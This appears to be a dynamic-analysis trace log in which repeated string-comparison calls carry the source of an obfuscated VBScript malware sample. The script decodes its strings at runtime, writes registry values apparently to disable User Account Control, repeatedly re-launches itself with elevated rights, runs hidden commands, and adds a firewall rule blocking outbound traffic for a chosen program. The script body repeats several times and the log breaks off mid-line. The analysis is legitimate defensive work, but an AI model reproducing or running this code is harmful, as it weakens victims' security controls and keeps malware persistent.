bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.344] wcsncmp (_String1="n rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.344] wcsncmp (_String1=" rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.344] wcsncmp (_String1="rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.344] wcsncmp (_String1="ules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.344] wcsncmp (_String1="les\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = 